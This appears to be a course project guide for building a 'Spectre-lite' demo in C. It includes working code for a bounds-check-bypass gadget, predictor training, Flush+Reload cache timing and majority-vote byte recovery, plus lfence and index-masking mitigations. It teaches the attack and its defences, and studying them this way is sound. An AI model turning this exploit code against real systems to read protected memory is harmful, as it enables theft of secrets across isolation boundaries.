Project 3: Speculative Side-Channel Explorer (Spectre-lite)

Build a controlled Spectre-style demo that leaks a secret byte via cache timing, then test mitigations.

Quick Reference

Attribute              Value
Difficulty             Level 4: Expert
Time Estimate          1-2 weeks
Main Language          C
Alternative Languages  Assembly
Coolness Level         Level 5: Pure Magic
Business Potential     3. The “Service & Support” Model
Prerequisites          C, pointers, cache basics, branch prediction basics
Key Topics             speculative execution, misprediction windows, cache timing, mitigation fences

1. Learning Objectives

By completing this project, you will:

  1. Explain how speculation can execute past bounds checks.
  2. Implement a cache timing side-channel using Flush+Reload.
  3. Measure the difference between L1 hits and misses in cycles.
  4. Demonstrate how fences and masking reduce leakage.
  5. Produce a reproducible demo with a clear success and failure case.

2. All Theory Needed (Per-Concept Breakdown)

2.1 Speculative Execution and Misprediction Windows

Fundamentals

Speculative execution is the CPU’s technique for keeping pipelines busy by executing instructions before it is certain they are needed. If the speculation is correct, performance improves. If it is wrong, the CPU discards the speculative results architecturally. However, speculative execution can still leave microarchitectural traces, such as cache state. A misprediction window is the time (in cycles and instructions) between a mispredicted branch and the moment the CPU realizes the mistake and flushes the pipeline. That window is where speculative instructions can execute and create side effects.

Additional fundamentals for Speculative Execution and Misprediction Windows: focus on the simplest mental model and the most common unit of measurement. Identify what changes state, what observes that state, and which constraints are non-negotiable. This keeps the concept grounded before moving to deeper microarchitectural details.

Deep Dive into the concept

Modern out-of-order CPUs execute instructions as soon as their inputs are ready, even if those instructions are on a path that may later be proven incorrect. The front-end predicts branch direction and feeds the pipeline; the backend issues uOps into execution units. The reorder buffer (ROB) tracks speculative instructions and ensures that only correct-path results retire. If the branch prediction is wrong, the ROB squashes the speculative instructions and restores the architectural state. But microarchitectural state, like cache lines brought into L1, is not fully rolled back. This is the core observation behind Spectre-style attacks.

The misprediction window exists because branch resolution is not instantaneous. A branch is resolved when the condition is computed, which often occurs in EX, but the decision can be delayed by data dependencies. The front-end keeps fetching along the predicted path, and the backend keeps executing those instructions. If the branch is mispredicted, all those speculative instructions are squashed. The number of instructions that can be in flight depends on the ROB size, the frontend width, and the branch resolution latency. This window is large enough for a small sequence of dependent operations to execute speculatively, including loads that touch memory based on secret data.

Spectre v1 exploits a bounds check. The pattern is: if (idx < array_len) { value = array[idx]; temp = probe[value * 4096]; } If the predictor is trained to expect the bounds check to pass, it predicts taken even when idx is out of bounds. The speculative execution then reads secret data from out-of-bounds memory and uses it to access a probe array. That access loads a cache line corresponding to the secret value. After the misprediction is resolved, the architectural state is rolled back, but the cache line remains. An attacker then times accesses to the probe array to infer which line is cached, revealing the secret.
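The pattern reads more clearly as code. A minimal C sketch of the gadget, with illustrative names (`array`, `probe`, and `sink` are assumptions for this sketch, not a fixed API):

```c
#include <stdint.h>
#include <stddef.h>

uint8_t array[16];           /* legitimate, in-bounds data */
size_t  array_len = 16;
uint8_t probe[256 * 4096];   /* one page per possible byte value */
volatile uint8_t sink;       /* keeps the access from being optimized out */

/* Architecturally safe: the out-of-bounds read never retires.
 * Speculatively leaky: if the predictor expects idx < array_len,
 * an out-of-bounds idx is read anyway and its value selects which
 * probe cache line gets loaded. */
void victim(size_t idx) {
    if (idx < array_len) {
        uint8_t value = array[idx];
        sink &= probe[value * 4096];
    }
}
```

Training the predictor with in-bounds calls and then calling `victim` with an out-of-bounds index produces the speculative probe access described above.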

The success of this attack depends on careful timing. The secret-dependent access must occur before the misprediction is resolved. That means the speculative path must be short and the data dependency chain must be quick. You can amplify the signal by spacing probe entries by 4096 bytes, ensuring each value maps to a different cache line and page. You also need to flush the probe array before each attempt to reset the cache state, using clflush or equivalent instructions. The attacker then measures reload times with RDTSC. The fast access indicates a cache hit and therefore the secret byte.

Mitigations attack this window. Fences like lfence act as serialization barriers: later instructions cannot execute until all prior instructions complete, so the speculative load after the bounds check is blocked. Index masking transforms the bounds check into a data dependency, forcing out-of-bounds indexes into a safe range regardless of prediction. Compilers and operating systems can insert fences or use safe array-indexing primitives automatically. These mitigations carry performance costs, however. Your project should demonstrate that adding fences reduces leakage but increases cycles, illustrating the trade-off between security and speed.
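Index masking can be made branchless. A sketch of one possible scheme, which collapses out-of-bounds indexes to 0 rather than clamping (`mask_index` is a hypothetical helper, not a standard API):

```c
#include <stdint.h>
#include <stddef.h>

/* Returns idx unchanged when idx < len, and 0 otherwise, using only
 * data dependencies: no branch for the predictor to speculate past. */
static inline size_t mask_index(size_t idx, size_t len) {
    size_t in_bounds = (size_t)(idx < len);   /* 1 or 0 */
    return idx & (in_bounds * (size_t)-1);    /* all-ones or all-zeros mask */
}
```

The Linux kernel applies a similar idea in its array_index_nospec() primitive; the fence variant instead inserts an lfence between the bounds check and the dependent load.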

Additional deep dive considerations: in real designs, speculation and its misprediction window are rarely isolated; they interact with pipeline depth, power management, compiler decisions, and even microcode updates. When you study this behavior, vary one knob at a time and hold everything else constant: pin the core, fix the frequency if possible, warm up caches and predictors, and record the exact compiler flags. Vendor manuals describe typical behavior, but the actual thresholds can shift across steppings or microcode revisions, so empirical measurement is the ground truth. If your results disagree with published numbers, investigate confounders such as alignment, instruction form, address mapping, or hidden dependencies introduced by the compiler. From a software perspective, compilers and JITs implicitly shape speculative behavior via instruction selection, scheduling, and unrolling, so translate your measurements into actionable rules of thumb. Finally, validate with at least two workloads: a synthetic microbenchmark and a slightly more realistic kernel. If both show the same trend, you can trust that the effect is not an artifact of the test harness.

How this fits into the project

You will use this concept in §3.1 and §3.2 to design the vulnerable code path and in §3.7 to interpret the leakage results and the effect of mitigations.

Definitions & key terms

  • speculation -> executing instructions before their necessity is proven
  • misprediction window -> time between wrong prediction and pipeline flush
  • ROB -> reorder buffer that tracks speculative instructions
  • bounds-check bypass -> speculatively executing past a bounds check

Mental model diagram (ASCII)

Predict taken -> [speculative load secret] -> [touch probe]
Mispredict -> flush architectural state
Cache line remains -> timing reveals secret

How it works (step-by-step, with invariants and failure modes)

  1. Train the branch predictor with in-bounds accesses.
  2. Call the vulnerable function with an out-of-bounds index.
  3. Speculatively read secret and touch probe array.
  4. Flush occurs; architectural effects are discarded.
  5. Time probe array to recover the secret byte.
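The five steps above can be combined into one attempt. A self-contained x86 sketch (simplified: a reliable leak also needs the refinements discussed in the text, such as flushing the length variable and a calibrated threshold; all names are illustrative):

```c
#include <stdint.h>
#include <stddef.h>
#include <x86intrin.h>   /* _mm_clflush, _mm_mfence, __rdtscp */

static uint8_t  array[16];
static size_t   array_len = 16;
static uint8_t  probe[256 * 4096];
static volatile uint8_t sink;

static void victim(size_t idx) {
    if (idx < array_len)
        sink &= probe[array[idx] * 4096];   /* the leaky gadget */
}

/* One train-mispredict-measure round; returns the fastest probe slot,
 * which is the best guess for the speculatively read byte. */
int one_attempt(size_t oob_idx) {
    unsigned aux;
    for (int v = 0; v < 256; v++)           /* step 4 prep: reset cache */
        _mm_clflush(&probe[v * 4096]);
    _mm_mfence();
    for (int t = 0; t < 30; t++)            /* step 1: train predictor */
        victim(t % array_len);
    victim(oob_idx);                        /* steps 2-3: mispredicted call */
    int best = 0;
    uint64_t best_dt = UINT64_MAX;
    for (int v = 0; v < 256; v++) {         /* step 5: time each reload */
        volatile uint8_t *p = &probe[v * 4096];
        uint64_t t0 = __rdtscp(&aux);
        (void)*p;
        uint64_t dt = __rdtscp(&aux) - t0;
        if (dt < best_dt) { best_dt = dt; best = v; }
    }
    return best;
}
```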

Invariants:

  • Architectural state must remain correct after misprediction.
  • Cache state is not fully rolled back.

Failure modes:

  • Speculation window too short to touch probe.
  • Predictor not sufficiently trained.

Minimal concrete example

if (idx < len) {
  uint8_t v = secret[idx];
  sink &= probe[v * 4096];
}

Common misconceptions

  • “Speculation is the same as prediction” -> speculation is execution; prediction is a guess.
  • “Flush removes cache effects” -> caches are not architecturally rolled back.

Check-your-understanding questions

  1. Why does a mispredicted branch still affect cache state?
  2. What determines the length of the misprediction window?
  3. Why is the probe array spaced by 4096 bytes?

Check-your-understanding answers

  1. The CPU only rolls back architectural state, not microarchitectural caches.
  2. Branch resolution latency, frontend width, and ROB capacity.
  3. To isolate cache lines and avoid prefetcher or line sharing effects.

Real-world applications

  • Security research and microarchitecture hardening
  • Side-channel analysis in cryptography

References

  • “Spectre Attacks: Exploiting Speculative Execution” by Kocher et al.
  • “Computer Architecture: A Quantitative Approach” Ch. 3

Key insights

  • Speculation can create measurable microarchitectural traces even when architectural state is correct.

Summary

Speculative execution trades correctness guarantees for performance, and its microarchitectural side effects can leak secrets when timing is measured carefully.

Homework/Exercises to practice the concept

  1. Explain why a data-dependent load is required for a Spectre v1 attack.
  2. Describe how a fence changes the speculative path.

Solutions to the homework/exercises

  1. The secret must influence which cache line is accessed to encode information.
  2. The fence blocks speculative execution past the bounds check.

2.2 Cache Timing and Flush+Reload

Fundamentals

Cache timing attacks distinguish whether a memory address is cached by measuring access latency. A cache hit is fast (a few cycles), while a cache miss is slower (tens to hundreds of cycles). Flush+Reload is a technique where you flush a cache line, allow a victim to potentially load it, and then reload it to see if it is fast. In this project, you are both attacker and victim, so you control the sequence. The key is that timing differences are large enough to be measured reliably with RDTSC when noise is controlled.

Additional fundamentals for Cache Timing and Flush+Reload: the state-changer is the flush (and the victim's reload), the observer is the timed access, and the non-negotiable constraint is serialized, cycle-resolution timing. Keep this simple model and the unit of measurement (cycles) in view before moving to deeper microarchitectural details.

Deep Dive into the concept

Modern CPUs use multi-level caches. L1 is the fastest and smallest; L2 and L3 are larger and slower. An access that hits L1 can take ~4 cycles, an L3 hit 30-50 cycles, and a memory miss can exceed 200 cycles. The attacker leverages this gap. In Flush+Reload, you first evict a cache line using clflush, which invalidates it from every cache level across the coherence domain. Then you allow execution to potentially bring it back in (the victim access). Finally, you time a reload of the same address. If the reload is fast, the line is back in the cache, indicating the victim accessed it.

Noise comes from hardware prefetchers, TLB effects, and interrupts. To reduce noise, you should use page-aligned buffers and large spacing between probe entries (4096 bytes) so each value maps to a unique cache line and page. This minimizes prefetching across adjacent lines. You should also use mfence or lfence around timing instructions to prevent reordering. When measuring, take many samples and choose a threshold that separates hits from misses. You can compute a histogram of access times and pick a cutoff (e.g., <= 80 cycles for hit). This threshold can be calibrated by measuring known hits and misses first.

Flush+Reload relies on shared memory in real attacks, but in this project you can use a single process. The important educational value is the observation that cache state persists after speculative execution. The reload timing becomes the channel. Your code should record the top candidate values for each attempt, then aggregate across multiple attempts to reduce error. A single run may be noisy, but repeated runs reveal the secret byte with high confidence.

The timing loop must be precise. Use rdtscp to read the timestamp counter with serialization. Use volatile reads to prevent the compiler from optimizing away the access. Keep the probe array in a dedicated buffer and avoid other memory activity between flush and reload. If you see inconsistent results, check core pinning and disable frequency scaling. You should also randomize the order of probing different values to avoid prefetcher patterns.
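These rules can be packaged into a small helper. A sketch using GCC/Clang x86 intrinsics (`timed_read` is an illustrative name):

```c
#include <stdint.h>
#include <x86intrin.h>   /* __rdtscp, _mm_lfence */

/* Cycle count for a single load. rdtscp waits for prior instructions
 * to complete; the trailing lfence keeps later code out of the window.
 * The volatile access prevents the compiler from deleting the load. */
static inline uint64_t timed_read(const uint8_t *addr) {
    unsigned aux;
    uint64_t t0 = __rdtscp(&aux);
    (void)*(const volatile uint8_t *)addr;
    uint64_t t1 = __rdtscp(&aux);
    _mm_lfence();
    return t1 - t0;
}
```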

Mitigation experiments can compare different variants: adding lfence after the bounds check should reduce leakage by preventing speculative execution of the probe load. Alternatively, index masking ensures out-of-bounds indexes map to safe values, which means the probe access will not encode secrets even if speculation occurs. Your timing code will show the difference: with mitigation, the hit rate should drop to near-random noise.

Additional deep dive considerations for Cache Timing and Flush+Reload: the same experimental discipline from §2.1 applies here. Flush+Reload interacts with prefetchers, power management, compiler scheduling, and microcode updates, so vary one knob at a time, pin the core, fix the frequency if possible, and record the exact compiler flags. Treat empirical measurement as ground truth when vendor numbers disagree, and validate on both a synthetic microbenchmark and a slightly more realistic kernel before trusting a trend.

How this fits into the project

You will use this concept to implement the measurement harness in §3.7 and to define thresholds and histograms in §5.10 Phase 2.

Definitions & key terms

  • cache hit/miss -> whether a line is in a cache level
  • clflush -> instruction to evict a cache line
  • Flush+Reload -> evict, let victim access, then time reload
  • threshold -> cycle cutoff used to classify hits vs misses

Mental model diagram (ASCII)

Flush line -> Victim access? -> Reload + time
Fast reload => cache hit => secret value

How it works (step-by-step, with invariants and failure modes)

  1. Flush all probe lines.
  2. Trigger speculative access that touches one probe line.
  3. Time reload of each probe entry.
  4. Choose lowest-latency entry as secret guess.
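Step 4 is a plain argmin over the measured latencies. A sketch (`best_candidate` is an illustrative name):

```c
#include <stdint.h>

/* Given reload latencies for all 256 probe slots, return the index of
 * the fastest reload: the most likely secret byte for this attempt. */
int best_candidate(const uint64_t lat[256]) {
    int best = 0;
    for (int v = 1; v < 256; v++)
        if (lat[v] < lat[best])
            best = v;
    return best;
}
```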

Invariants:

  • Flush must occur before victim access.
  • Reload timing must be serialized.

Failure modes:

  • Prefetcher brings in extra lines and pollutes signal.
  • Threshold too low or too high misclassifies hits.

Minimal concrete example

/* x86; requires <x86intrin.h> and <stdint.h> */
unsigned aux;
_mm_clflush(&probe[i * 4096]);          /* evict the line */
uint64_t t0 = __rdtscp(&aux);
volatile uint8_t x = probe[i * 4096];   /* timed reload */
uint64_t dt = __rdtscp(&aux) - t0;

Common misconceptions

  • “Cache timing is too noisy” -> with pinning and repetition it is reliable.
  • “Flush removes all traces” -> cache misses can still be inferred by reload timing.

Check-your-understanding questions

  1. Why do you need a threshold between hits and misses?
  2. Why is 4096-byte spacing common in Spectre demos?
  3. What does clflush guarantee?

Check-your-understanding answers

  1. Timing values overlap; the threshold separates distributions.
  2. It isolates cache lines and pages, reducing prefetch interference.
  3. It invalidates the line from every level of the cache hierarchy, across the coherence domain, so the next access misses.

Real-world applications

  • Side-channel research in cryptography
  • Cache-based covert channels

References

  • “Flush+Reload: A High Resolution, Low Noise L3 Cache Side-Channel Attack” by Yarom and Falkner
  • “Practical Binary Analysis” by Dennis Andriesse

Key insights

  • Cache timing is a high-bandwidth channel when experiments are controlled.

Summary

Flush+Reload turns cache presence into a measurable signal. When combined with speculation, it can leak data even if architectural state is correct.

Homework/Exercises to practice the concept

  1. Measure and plot a histogram of access times for cached vs flushed lines.
  2. Pick a threshold that minimizes classification error.

Solutions to the homework/exercises

  1. Cached accesses cluster at low cycles, flushed accesses at high cycles.
  2. Choose the valley between the two clusters.

2.3 Cache Timing Measurement and Side-Channel Hygiene

Fundamentals

Speculative side channels only work if you can measure time precisely and control cache state. The core idea is simple: if a line is in cache, it loads quickly; if it is not, it loads slowly. A side-channel attack turns this timing gap into a bit of information. To build a reliable experiment, you need a timer with sub-100 ns resolution, a method to evict or flush cache lines, and a threshold that classifies “hit” vs “miss” with low error. You also need to design your experiment so that the timing signal is not drowned out by noise from the OS, interrupts, or prefetchers. Without careful timing hygiene, you will see random results and mistakenly attribute them to speculation.

Deep Dive into the concept

Timing measurement on modern CPUs is tricky because the pipeline can reorder memory operations and because the timer itself may be speculatively executed. The standard tool on x86 is RDTSC or RDTSCP, often wrapped with LFENCE to serialize. A robust pattern is: LFENCE; RDTSC; load; LFENCE; RDTSCP. This ensures the load completes before you read the end timestamp. On ARM, you use CNTVCT or PMU counters with ISB barriers. The goal is to isolate the load latency from surrounding noise.

Cache control is the other half of the problem. Flush+Reload uses a shared memory line and the CLFLUSH instruction to evict it from cache. After a speculative access, you reload that line and measure the time. If the line is fast, you infer it was touched. Prime+Probe works without shared memory: you fill a cache set with your own lines (prime), let the victim run, and then measure how many lines were evicted (probe). Prime+Probe is more portable but noisier because it depends on cache set mapping and interference. In your Spectre-lite project, Flush+Reload is usually the easiest because it yields a strong signal, but you should still understand Prime+Probe because it models real-world attacks across processes.

The threshold between hit and miss must be calibrated on your actual machine. You can build a histogram of access times for known hot and cold lines and choose a threshold that minimizes misclassification. This threshold is often in the 80-150 cycle range on modern x86, but it varies with frequency and cache hierarchy. Do not hardcode it; measure it. If you skip this step, your “leak” may just be timing noise. Also note that hardware prefetchers can create false hits. To reduce prefetch effects, stride across lines in a pseudo-random pattern or use an access pattern that avoids simple linear strides.
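Calibration can be automated by measuring the medians of known-hot and known-flushed reloads and splitting the difference. An x86 sketch (function names are illustrative):

```c
#include <stdint.h>
#include <stdlib.h>
#include <x86intrin.h>   /* _mm_clflush, _mm_mfence, __rdtscp */

static int cmp_u64(const void *a, const void *b) {
    uint64_t x = *(const uint64_t *)a, y = *(const uint64_t *)b;
    return (x > y) - (x < y);
}

/* Median reload latency of `line`, warmed (flushed == 0) or flushed. */
static uint64_t median_latency(uint8_t *line, int flushed) {
    enum { SAMPLES = 256 };
    uint64_t s[SAMPLES];
    unsigned aux;
    for (int i = 0; i < SAMPLES; i++) {
        if (flushed) { _mm_clflush(line); _mm_mfence(); }
        else         { (void)*(volatile uint8_t *)line; }  /* warm it */
        uint64_t t0 = __rdtscp(&aux);
        (void)*(volatile uint8_t *)line;
        s[i] = __rdtscp(&aux) - t0;
    }
    qsort(s, SAMPLES, sizeof s[0], cmp_u64);
    return s[SAMPLES / 2];
}

/* Threshold halfway between the hit and miss medians; falls back to
 * hit + 1 if this machine shows no measurable gap. */
uint64_t calibrate(uint8_t *line) {
    uint64_t hit  = median_latency(line, 0);
    uint64_t miss = median_latency(line, 1);
    return miss > hit ? hit + (miss - hit) / 2 : hit + 1;
}
```

Medians rather than means keep interrupt outliers from skewing the threshold.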

Noise reduction is a serious engineering problem. Pin your process to a core, disable frequency scaling if you can, and keep the machine quiet. If that is not possible, take many samples and use median or majority voting. In Spectre-style experiments, you are often extracting a single bit per trial, so statistical aggregation is your friend. Build your harness so it can run thousands of iterations and produce confidence levels for each leaked bit.
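Majority voting over repeated trials is only a few lines. A sketch (`vote` is an illustrative name):

```c
#include <stddef.h>

/* Tally per-attempt byte guesses and return the winner; confidence is
 * the winning fraction of valid votes. */
int vote(const int *guesses, size_t n, double *confidence) {
    int counts[256] = {0};
    size_t valid = 0;
    for (size_t i = 0; i < n; i++) {
        if (guesses[i] >= 0 && guesses[i] < 256) {
            counts[guesses[i]]++;
            valid++;
        }
    }
    int best = 0;
    for (int v = 1; v < 256; v++)
        if (counts[v] > counts[best])
            best = v;
    if (confidence)
        *confidence = valid ? (double)counts[best] / (double)valid : 0.0;
    return best;
}
```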

Finally, side-channel hygiene matters even in an educational project. You should implement a “safe mode” that avoids reading any real secrets and uses synthetic data instead. You should also include mitigations (like LFENCE or array index masking) and show that the timing signal disappears when mitigations are enabled. This keeps the project ethical and teaches the core lesson: speculative side channels are about microarchitectural state, not architectural permissions.

How this fits into the project

You will use these techniques in §3.4 Example Output, §5.10 Phase 2 to implement the timing harness, and §7.2 to debug noisy or inconsistent results.

Definitions & key terms

  • Flush+Reload -> evict a shared line, then time the reload to infer access
  • Prime+Probe -> fill a cache set, then probe for evictions
  • threshold -> timing boundary that separates hit vs miss
  • serialization -> forcing instructions to complete in order for timing accuracy
  • prefetcher noise -> false hits caused by hardware prefetching

Mental model diagram (ASCII)

[Flush] -> [Speculative Access] -> [Reload + Time]
   hit => fast time => bit = 1
   miss => slow time => bit = 0

How it works (step-by-step, with invariants and failure modes)

  1. Calibrate hit/miss timing thresholds.
  2. Flush or prime the cache state.
  3. Trigger speculative access that depends on secret data.
  4. Reload and time candidate lines.
  5. Classify timings and aggregate over many trials.

Invariants:

  • Timing measurement must be serialized.
  • Cache state must be controlled before each trial.

Failure modes:

  • Prefetchers create false positives.
  • Timer noise hides the signal.
  • Threshold is miscalibrated, flipping bits.

Minimal concrete example

// x86; requires <x86intrin.h> and <stdint.h>
_mm_clflush((void *)line);               // evict the line
_mm_mfence();                            // ensure the flush completes
uint64_t start = __rdtsc();
(void)*(volatile uint8_t *)line;         // the measured load
uint64_t cycles = __rdtsc() - start;

Common misconceptions

  • “Any timer works” -> You need serialization and cycle-level resolution.
  • “Flush+Reload is always clean” -> Prefetchers and SMT can still add noise.
  • “One trial proves a leak” -> You need statistical aggregation.

Check-your-understanding questions

  1. Why do you need to calibrate the hit/miss threshold on the target machine?
  2. What is the difference between Flush+Reload and Prime+Probe in terms of requirements?
  3. How do fences (LFENCE/ISB) improve timing accuracy?

Check-your-understanding answers

  1. Because cache latencies vary by CPU, frequency, and system load.
  2. Flush+Reload requires shared memory; Prime+Probe does not but is noisier.
  3. They serialize execution so the timing window surrounds the target load.

Real-world applications

  • Security research into speculative execution attacks
  • Constant-time cryptographic implementations
  • Performance debugging of cache-sensitive code

References

  • “Spectre Attacks: Exploiting Speculative Execution” (Kocher et al.)
  • “A Primer on Cache Attacks” (Gruss et al.)

Key insights

  • The side channel is the timing signal; everything else is just a way to amplify it.

Summary

Speculative leaks only appear when you can measure cache timing reliably. Calibrate, control cache state, and aggregate results, or your experiment will mislead you.

Homework/Exercises to practice the concept

  1. Build a histogram of cache hit and miss times on your machine and choose a threshold.
  2. Compare Flush+Reload and Prime+Probe on the same buffer and report noise levels.

Solutions to the homework/exercises

  1. The hit cluster should be clearly below the miss cluster; choose a threshold between them.
  2. Prime+Probe will show wider variance and a higher false-positive rate.

3. Project Specification

3.1 What You Will Build

A Spectre-lite demo that leaks a single secret byte using speculative execution and cache timing. The project includes a vulnerable function, a training loop, a probe array, a timing measurement routine, and mitigation toggles (fence or masking). The output shows the recovered secret and the confidence level.

3.2 Functional Requirements

  1. Vulnerable Gadget: A bounds-checked array access that can be mispredicted.
  2. Training Phase: Repeated in-bounds accesses to train the predictor.
  3. Probe Array: 256 entries spaced by 4096 bytes.
  4. Timing Harness: Flush+Reload with threshold-based hit detection.
  5. Mitigations: Optional lfence and index masking toggles.

3.3 Non-Functional Requirements

  • Performance: Recover a byte within 1 second for 1000 attempts.
  • Reliability: At least 90 percent correct hits across trials.
  • Usability: CLI flags for iterations and mitigation mode.

3.4 Example Usage / Output

$ ./spectre_lite --secret "S" --tries 1000 --mitigation none
Recovered: 0x53 'S' (confidence 96%)

3.5 Data Formats / Schemas / Protocols

Output format:

secret_byte,confidence,mitigation
0x53,0.96,none

3.6 Edge Cases

  • Secret byte that equals 0x00 or 0xFF
  • Threshold too tight causing misclassification
  • System noise leading to wrong top candidate

3.7 Real World Outcome

You will see the secret byte recovered when mitigation is off, and near-random guesses when mitigation is on.

3.7.1 How to Run (Copy/Paste)

cc -O2 -Wall -o spectre_lite src/spectre_lite.c
sudo taskset -c 2 ./spectre_lite --secret "S" --tries 1000 --mitigation none

3.7.2 Golden Path Demo (Deterministic)

  • Use --tries 1000 --seed 42 on an otherwise idle core.
  • Expect recovered byte to match the secret with >90 percent confidence.

3.7.3 If CLI: Exact Terminal Transcript

$ taskset -c 2 ./spectre_lite --secret "S" --tries 1000 --mitigation none
Recovered: 0x53 'S' (confidence 96%)

$ echo $?
0

Failure demo (mitigation on):

$ taskset -c 2 ./spectre_lite --secret "S" --tries 1000 --mitigation lfence
Recovered: 0x12 (confidence 18%)

$ echo $?
0

Exit codes:

  • 0 success
  • 2 missing or invalid args
  • 3 timing initialization error

4. Solution Architecture

4.1 High-Level Design

+-------------------+    +--------------+    +-----------------+
| Training + Gadget | -> | Probe Access | -> | Timing + Report |
+-------------------+    +--------------+    +-----------------+

4.2 Key Components

Component    Responsibility            Key Decisions
Gadget       Speculative access path   Keep short dependency chain
Probe Array  Encode secret into cache  4096-byte spacing
Timing       Measure reload times      RDTSCP + threshold

4.3 Data Structures (No Full Code)

uint8_t probe[256 * 4096];
volatile uint8_t sink;

4.4 Algorithm Overview

Key Algorithm: Recover Secret

  1. Flush probe array.
  2. Train predictor with in-bounds indices.
  3. Call gadget with out-of-bounds index.
  4. Time probe entries and pick lowest latency.

Complexity Analysis:

  • Time: O(tries * 256)
  • Space: O(256 * 4096)

5. Implementation Guide

5.1 Development Environment Setup

cc --version
# Optional: disable turbo and pin to core for stability

5.2 Project Structure

spectre-lite/
├── src/
│   ├── main.c
│   ├── timing.c
│   └── gadget.c
├── tests/
│   └── test_threshold.c
└── README.md

5.3 The Core Question You’re Answering

“Can speculation leak data even when the program is correct?”

Your demo proves that microarchitectural state can reveal secrets.

5.4 Concepts You Must Understand First

  1. Speculation and pipeline flushes
  2. Cache timing and clflush
  3. Fences and masking mitigations

5.5 Questions to Guide Your Design

  1. How will you ensure the gadget executes speculatively?
  2. How will you choose a timing threshold?
  3. How will you measure confidence in the recovered byte?

5.6 Thinking Exercise

Sketch the pipeline timeline of a mispredicted bounds check. Where does the secret-dependent access occur?

5.7 The Interview Questions They’ll Ask

  1. Why does speculative execution leave cache traces?
  2. What does lfence do and why does it help?
  3. Why is the probe array spaced by 4096 bytes?

5.8 Hints in Layers

Hint 1: Shorten the gadget to keep within the misprediction window.

Hint 2: Calibrate a hit/miss threshold before running the attack.

Hint 3: Use multiple attempts and vote for the top candidate.

5.9 Books That Will Help

Topic                Book                         Chapter
Speculation basics   “Computer Architecture”      Ch. 3
Side-channel timing  “Practical Binary Analysis”  timing chapter

5.10 Implementation Phases

Phase 1: Foundation (2-3 days)

  • Implement timing and cache flush primitives.
  • Checkpoint: clear hit vs miss timing histogram.

Phase 2: Core Functionality (4-6 days)

  • Implement gadget and training loop.
  • Checkpoint: leak a single byte with >80 percent accuracy.

Phase 3: Mitigations (2-3 days)

  • Add lfence and masking options.
  • Checkpoint: leakage drops near random.

5.11 Key Implementation Decisions

Decision          Options              Recommendation  Rationale
Timing threshold  fixed vs calibrated  calibrated      portable across CPUs
Mitigation        lfence vs masking    both            show trade-off

6. Testing Strategy

6.1 Test Categories

Category           Purpose             Examples
Unit Tests         Timing correctness  hit vs miss latency
Integration Tests  Full leak           recover secret
Edge Tests         secret 0x00         probe index 0

6.2 Critical Test Cases

  1. Cached line should be below threshold.
  2. Flushed line should be above threshold.
  3. Mitigation should reduce accuracy.

6.3 Test Data

secret='S' (0x53)

7. Common Pitfalls & Debugging

7.1 Frequent Mistakes

Pitfall                Symptom             Solution
Prefetch interference  wrong byte guesses  randomize probe order
Too short training     low accuracy        increase training iterations
Bad threshold          noisy results       calibrate hit/miss

7.2 Debugging Strategies

  • Print the top 5 candidate bytes with scores.
  • Use perf to verify branch misses occur.

7.3 Performance Traps

  • The 256 x 4096-byte probe array is about 1 MiB and cannot fit in L1; time one entry at a time and avoid touching unrelated memory between flush and reload so probe lines do not evict one another.

8. Extensions & Challenges

8.1 Beginner Extensions

  • Leak multiple bytes with repeated runs.

8.2 Intermediate Extensions

  • Compare lfence vs masking overhead.

8.3 Advanced Extensions

  • Implement a variant that targets a different gadget or cache level.

9. Real-World Connections

9.1 Industry Applications

  • Security audits for JITs and sandboxed runtimes
  • CPU vendor mitigation evaluation

9.2 Related Tools

  • spectre-meltdown-checker: detection scripts and mitigations
  • pythia: academic cache timing frameworks

9.3 Interview Relevance

  • Demonstrates understanding of speculation, caches, and side channels.

10. Resources

10.1 Essential Reading

  • “Spectre Attacks” paper
  • “Practical Binary Analysis” by Dennis Andriesse

10.2 Video Resources

  • “Spectre and Meltdown Explained” - security conference talk

10.3 Tools & Documentation

  • perf: measure branch misses
  • objdump: inspect emitted assembly

11. Self-Assessment Checklist

11.1 Understanding

  • I can explain speculative execution and why mispredictions flush.
  • I can describe cache timing and Flush+Reload.
  • I can explain why mitigations reduce leakage.

11.2 Implementation

  • The leak works without mitigation.
  • The leak fails with mitigation enabled.
  • Results are reproducible on a pinned core.

11.3 Growth

  • I can discuss side-channel risks in an interview.
  • I documented all measurement parameters.

12. Submission / Completion Criteria

Minimum Viable Completion:

  • Leak one byte with >70 percent accuracy.
  • Provide timing histograms for hit vs miss.

Full Completion:

  • Implement and compare two mitigations.

Excellence (Going Above & Beyond):

  • Extend to multi-byte leakage with error-correcting voting.